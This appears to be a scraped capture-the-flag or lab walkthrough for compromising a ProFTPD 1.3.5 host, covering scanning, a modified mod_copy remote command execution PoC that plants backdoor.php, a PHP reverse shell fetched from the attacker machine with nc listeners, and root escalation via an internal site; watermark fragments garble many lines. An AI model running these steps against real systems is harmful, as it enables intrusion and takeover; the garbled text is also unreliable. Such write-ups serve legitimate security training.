Professional Documents
Culture Documents
110_ProFTPD
110_ProFTPD
i to
. 110 ProFTPD
Ed
Nmap
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
DF
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
rP
|_http-title: Apache2 Debian Default Page: It works
/level
as
/server-status
^:8098 directories
M
………………………………………………….
Discovery of /level/
in
dirb http://192.168.142.110:8098/
ed
https://www.exploit-db.com/exploits/49908
You will find something even better when you look for it, but it won’t work.
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution
https://github.com/t0kx/exploit-CVE-2015-3306
in
Edit PoC
ed
self.__host + "/backdoor.php")
---
> print("[+] Target exploited, acessing shell at http://" +
self.__host + ":8098/level/backdoor.php")
re
40c40
r
i to
< data = requests.get("http://" + self.__host +
"/backdoor.php?cmd=whoami")
---
> data = requests.get("http://" + self.__host +
":8098/level/backdoor.php?cmd=whoami")
Ed
Drop php reverse shell
DF
The web shell is very inconvenient.
Drop and place the php reverse shell from the attack machine.
rP
shell.php
python -m SimpleHTTPServer 5555
nc -nvlp 4444
After a successful intrusion, reconnect to port 6666. This is because the root shell may use port
4444 next.
at
Ed
DF
In addition, there seems to be an internal site on ports 5000 and 3306.
rP
te
as
Copy php reverse shell
Now that we know the internal site is running as root, can we install a php reverse shell here?
Luckily You noticed /var/www2/ before looking at the configuration file.
M
in
ed
at
re
r
i to
Inside you will find /files and /files/robots.txt, use curl to see if they match.
curl http://127.0.0.1:5000
<?xml version="1.0" encoding="iso-8859-1"?>
Ed
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>403 Forbidden</h1>
DF
</body>
</html>
curl http://127.0.0.1:5000/files/robots.txt
User-agent: *
Disallow: /config.php
Disallow: /administration/
Disallow: /includes/
rP
Disallow: /locale/
Disallow: /themes/
Disallow: /print.php
Privilege Escalation
curl http://127.0.0.1:5000/files/shell.php
Accessed from the inside, you will receive a reverse “root” shell with nc.
in
nc -nvlp 4444